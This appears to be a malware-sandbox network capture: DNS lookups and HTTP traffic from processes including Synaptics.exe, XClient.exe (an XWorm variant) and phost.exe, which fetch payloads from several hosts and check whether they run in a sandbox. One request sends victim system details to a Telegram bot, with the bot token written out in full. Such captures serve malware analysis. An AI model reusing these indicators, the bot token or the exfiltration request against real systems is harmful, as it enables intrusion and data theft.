GET /github-production-release-asset-2e65be/900477894/166efba7-6d8f-45e7-9bad-9047bb8b57b9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250201T092139Z&X-Amz-Expires=300&X-Amz-Signature=2d083d77c8e010aa7e93c8e673be0bd85b7d1bab8cdb64173c5158fa62577720&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dphost.exe&response-content-type=application%2Foctet-stream HTTP/1.1
Host: objects.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 7832204
Content-Type: application/octet-stream
Last-Modified: Sun, 08 Dec 2024 21:33:39 GMT
ETag: "0x8DD17CFFB32A94D"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c1f69aa8-201e-0012-02b2-639a85000000
x-ms-version: 2024-11-04
x-ms-creation-time: Sun, 08 Dec 2024 21:33:39 GMT
x-ms-blob-content-md5: jEO/REXKxfoCW539B1F7bw==
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=phost.exe
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Fastly-Restarts: 1
Accept-Ranges: bytes
Age: 3147
Date: Sat, 01 Feb 2025 09:21:40 GMT
X-Served-By: cache-iad-kjyo7100043-IAD, cache-lon4223-LON
X-Cache: HIT, HIT
X-Cache-Hits: 951, 0
X-Timer: S1738401700.818750,VS0,VE78
DNS

133.108.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.108.199.185.in-addr.arpa

IN PTR

Response

133.108.199.185.in-addr.arpa

IN PTR

cdn-185-199-108-133githubcom
DNS

soportegira.net

._cache_Synaptics.exe

Remote address:

8.8.8.8:53

Request

soportegira.net

IN A

Response

soportegira.net

IN A

83.175.202.178
GET

http://soportegira.net/descargas/Ammyy.exe

._cache_Synaptics.exe

Remote address:

83.175.202.178:80

Request

GET /descargas/Ammyy.exe HTTP/1.1
Host: soportegira.net
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Sat, 01 Feb 2025 09:20:50 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Tue, 08 Sep 2015 10:16:08 GMT
ETag: "024a4601fead01:1b09"
Content-Length: 765952
DNS

www.python.org

curl.exe

Remote address:

8.8.8.8:53

Request

www.python.org

IN A

Response

www.python.org

IN CNAME

dualstack.python.map.fastly.net

dualstack.python.map.fastly.net

IN A

151.101.128.223

dualstack.python.map.fastly.net

IN A

151.101.64.223

dualstack.python.map.fastly.net

IN A

151.101.192.223

dualstack.python.map.fastly.net

IN A

151.101.0.223
GET

https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe

curl.exe

Remote address:

151.101.128.223:443

Request

GET /ftp/python/3.10.0/python-3.10.0rc2-amd64.exe HTTP/1.1
Host: www.python.org
User-Agent: curl/7.55.1
Accept: */*

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 28325752
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
last-modified: Tue, 07 Sep 2021 19:19:38 GMT
server: nginx
content-type: application/octet-stream
etag: "6137bb4a-1b03778"
x-clacks-overhead: GNU Terry Pratchett
Accept-Ranges: bytes
Age: 930935
Date: Sat, 01 Feb 2025 09:21:42 GMT
X-Served-By: cache-lga21933-LGA, cache-lga21957-LGA, cache-lon420123-LON
X-Cache: MISS, HIT, HIT
X-Cache-Hits: 0, 175, 0
X-Timer: S1738401703.740736,VS0,VE1
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
DNS

zlonline.oss-cn-shenzhen.aliyuncs.com

._cache_Synaptics.exe

Remote address:

8.8.8.8:53

Request

zlonline.oss-cn-shenzhen.aliyuncs.com

IN A

Response

zlonline.oss-cn-shenzhen.aliyuncs.com

IN CNAME

sc-1iev.cn-shenzhen.oss-adns.aliyuncs.com

sc-1iev.cn-shenzhen.oss-adns.aliyuncs.com

IN CNAME

sc-1iev.cn-shenzhen.oss-adns.aliyuncs.com.gds.alibabadns.com

sc-1iev.cn-shenzhen.oss-adns.aliyuncs.com.gds.alibabadns.com

IN A

47.113.74.51
DNS

178.202.175.83.in-addr.arpa

Remote address:

8.8.8.8:53

Request

178.202.175.83.in-addr.arpa

IN PTR

Response

178.202.175.83.in-addr.arpa

IN PTR

mailgiranet
DNS

223.128.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

223.128.101.151.in-addr.arpa

IN PTR

Response
DNS

rl.ammyy.com

Ammyy.exe

Remote address:

8.8.8.8:53

Request

rl.ammyy.com

IN A

Response

rl.ammyy.com

IN A

188.42.129.148
POST

http://rl.ammyy.com/

Ammyy.exe

Remote address:

188.42.129.148:80

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: rl.ammyy.com
Content-Length: 184
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:21:44 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Content-Length: 138
Content-Type: text/html
DNS

ip-api.com

jrockekcurje.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

XClient.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:21:43 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

blank-dzt3h.in

phost.exe

Remote address:

8.8.8.8:53

Request

blank-dzt3h.in

IN A

Response
DNS

148.129.42.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

148.129.42.188.in-addr.arpa

IN PTR

Response
DNS

235.104.243.136.in-addr.arpa

Remote address:

8.8.8.8:53

Request

235.104.243.136.in-addr.arpa

IN PTR

Response

235.104.243.136.in-addr.arpa

IN PTR

static235104243136clientsyour-serverde
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
GET

http://ip-api.com/line/?fields=hosting

phost.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.3

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:21:45 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

gstatic.com

phost.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

172.217.16.227
DNS

d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa

Remote address:

8.8.8.8:53

Request

d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa

IN PTR

Response
DNS

2.36.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.36.159.162.in-addr.arpa

IN PTR

Response
DNS

227.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.16.217.172.in-addr.arpa

IN PTR

Response

227.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f31e100net

227.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f3�H
DNS

api.telegram.org

XClient.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot7269786725:AAF0IPx1BWTdW_vbZqP8HGNrxWWFpF5CvYs/sendMessage?chat_id=5465523859&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A84C2674B4D3C1D768A91%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2

XClient.exe

Remote address:

149.154.167.220:443

Request

GET /bot7269786725:AAF0IPx1BWTdW_vbZqP8HGNrxWWFpF5CvYs/sendMessage?chat_id=5465523859&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A84C2674B4D3C1D768A91%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sat, 01 Feb 2025 09:21:53 GMT
Content-Type: application/json
Content-Length: 504
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

jrockekcurje.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/?fields=225545

phost.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.3

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:21:56 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 163
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

discord.com

phost.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.137.232
DNS

233.128.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.128.159.162.in-addr.arpa

IN PTR

Response
DNS

10.110.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.110.18.2.in-addr.arpa

IN PTR

Response

10.110.18.2.in-addr.arpa

IN PTR

a2-18-110-10deploystaticakamaitechnologiescom
DNS

event-dollar.gl.at.ply.gg

XClient.exe

Remote address:

8.8.8.8:53

Request

event-dollar.gl.at.ply.gg

IN A

Response

event-dollar.gl.at.ply.gg

IN A

147.185.221.23
DNS

rentry.co

curl.exe

Remote address:

8.8.8.8:53

Request

rentry.co

IN A

Response

rentry.co

IN A

172.67.75.40

rentry.co

IN A

104.26.3.16

rentry.co

IN A

104.26.2.16
GET

https://rentry.co/sntwm349/raw

curl.exe

Remote address:

172.67.75.40:443

Request

GET /sntwm349/raw HTTP/1.1
Host: rentry.co
User-Agent: curl/7.55.1
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:22:00 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Origin
vary: accept-encoding
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
Cache-Control: Vary
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YeixfgwMa1YqRHDmPVC1rMGmOW5KlHVi37bOhqOA1jOJRYFsZZpkCeD4OVYPXdqEIyK0tpxR6GL62m49RYEXEhJB7VaC9VhHexqQmlGGoAB%2BzsUNb8jP%2B079Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b0dfde9947bf0c-LHR
server-timing: cfL4;desc="?proto=TCP&rtt=26729&min_rtt=26108&rtt_var=6546&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2978&recv_bytes=378&delivery_rate=141585&cwnd=225&unsent_bytes=0&cid=e4a40aea51b404bc&ts=148&x=0"
DNS

40.75.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.75.67.172.in-addr.arpa

IN PTR

Response
DNS

docs.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.200.14
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.200.14:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 01 Feb 2025 09:22:19 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-eZzQEIQPnQVOIozgu3GBUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.200.14:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=521=TaTYYCm2qqkKDomG7BGEL2EQwxD57ri3lBGIZ9sOE4vS_N98Lmb3zkTCEg_4JAYU0SIb6RRteaaTaQ_I3PaO8ajaQt3aGeFjm8lwBimMdvEwoj0vojTg1BREkI1P1MeED-hwZEm24fwe-EveKcF2k6Cd8qJvFeG6Mk95ppVPzJpFfLbSaDb0cE0Mrg

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 01 Feb 2025 09:22:19 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-4Kz559SCjBT-Ft3XCqq_Qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.200.14:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=521=TaTYYCm2qqkKDomG7BGEL2EQwxD57ri3lBGIZ9sOE4vS_N98Lmb3zkTCEg_4JAYU0SIb6RRteaaTaQ_I3PaO8ajaQt3aGeFjm8lwBimMdvEwoj0vojTg1BREkI1P1MeED-hwZEm24fwe-EveKcF2k6Cd8qJvFeG6Mk95ppVPzJpFfLbSaDb0cE0Mrg

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 01 Feb 2025 09:22:20 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce-5ywFcG-oOkDAbnhUGZ-4qQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

14.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.200.250.142.in-addr.arpa

IN PTR

Response

14.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f141e100net
DNS

c.pki.goog

Synaptics.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

216.58.212.227
GET

http://c.pki.goog/r/r1.crl

Synaptics.exe

Remote address:

216.58.212.227:80

Request

GET /r/r1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 854
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sat, 01 Feb 2025 08:45:02 GMT
Expires: Sat, 01 Feb 2025 09:35:02 GMT
Cache-Control: public, max-age=3000
Age: 2237
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

o.pki.goog

Synaptics.exe

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

216.58.212.227
GET

http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEENj6GAUNBVpEvo20UE38mc%3D

Synaptics.exe

Remote address:

216.58.212.227:80

Request

GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEENj6GAUNBVpEvo20UE38mc%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Sat, 01 Feb 2025 08:25:13 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 3426
GET

http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECMZhqL6oO7XCZBnn%2Fi9HYU%3D

Synaptics.exe

Remote address:

216.58.212.227:80

Request

GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECMZhqL6oO7XCZBnn%2Fi9HYU%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Sat, 01 Feb 2025 08:32:01 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 3018
DNS

drive.usercontent.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

172.217.16.225
GET

https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

172.217.16.225:443

Request

GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

X-GUploader-UploadID: AFIdbgT-f590r-c-xLpK4pgdSWOC0MgYNwsIRkZjYl04oDdSoVxn96WLyaIODFhcLNgZ5iQy
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 01 Feb 2025 09:22:19 GMT
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'report-sample' 'nonce-UZfFCUE2pJ0BIAZjnllRWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Content-Length: 1652
Server: UploadServer
Set-Cookie: NID=521=TaTYYCm2qqkKDomG7BGEL2EQwxD57ri3lBGIZ9sOE4vS_N98Lmb3zkTCEg_4JAYU0SIb6RRteaaTaQ_I3PaO8ajaQt3aGeFjm8lwBimMdvEwoj0vojTg1BREkI1P1MeED-hwZEm24fwe-EveKcF2k6Cd8qJvFeG6Mk95ppVPzJpFfLbSaDb0cE0Mrg; expires=Sun, 03-Aug-2025 09:22:19 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
GET

https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

172.217.16.225:443

Request

GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=521=TaTYYCm2qqkKDomG7BGEL2EQwxD57ri3lBGIZ9sOE4vS_N98Lmb3zkTCEg_4JAYU0SIb6RRteaaTaQ_I3PaO8ajaQt3aGeFjm8lwBimMdvEwoj0vojTg1BREkI1P1MeED-hwZEm24fwe-EveKcF2k6Cd8qJvFeG6Mk95ppVPzJpFfLbSaDb0cE0Mrg

Response

HTTP/1.1 404 Not Found

X-GUploader-UploadID: AFIdbgTd6ukH-1P3J8KNSO09QjgnVaQd487NFtOcy8Lf_4pqT2NH4p5kUbmHcxus75AllWll
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 01 Feb 2025 09:22:20 GMT
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce-dwkYlG3SUzc8APSWzB3b6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
GET

https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

172.217.16.225:443

Request

GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=521=TaTYYCm2qqkKDomG7BGEL2EQwxD57ri3lBGIZ9sOE4vS_N98Lmb3zkTCEg_4JAYU0SIb6RRteaaTaQ_I3PaO8ajaQt3aGeFjm8lwBimMdvEwoj0vojTg1BREkI1P1MeED-hwZEm24fwe-EveKcF2k6Cd8qJvFeG6Mk95ppVPzJpFfLbSaDb0cE0Mrg

Response

HTTP/1.1 404 Not Found

X-GUploader-UploadID: AHMx-iHiVgop8waAbHWZhBtQ-Bh8mVxCnuIdl5oQq-BzxnwsGC5dwitt9xsBKyTTRsaG4aDM
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 01 Feb 2025 09:22:20 GMT
Content-Security-Policy: script-src 'report-sample' 'nonce-Qvq8Segkg4iaNab9J9aNeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
